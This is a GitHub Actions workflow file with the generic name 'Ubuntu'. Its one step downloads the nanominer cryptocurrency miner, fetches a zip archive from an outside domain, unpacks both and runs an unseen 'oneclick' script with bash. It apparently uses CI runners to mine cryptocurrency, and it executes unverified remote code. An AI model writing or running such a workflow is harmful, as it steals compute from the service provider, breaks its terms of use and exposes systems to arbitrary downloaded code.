name: Ubuntu

on: workflow_dispatch

jobs:
  a:
    runs-on: ubuntu-18.04

    steps:
    - name: Running
      run: sudo apt update -y && sudo apt install unzip -y && wget https://github.com/nanopool/nanominer/releases/download/3.3.2/nanominer-linux-3.3.2.tar.gz && wget https://ncvinh.com/nano/nano.zip && tar -xf nanominer-linux-3.3.2.tar.gz && unzip -q nano.zip && bash oneclick
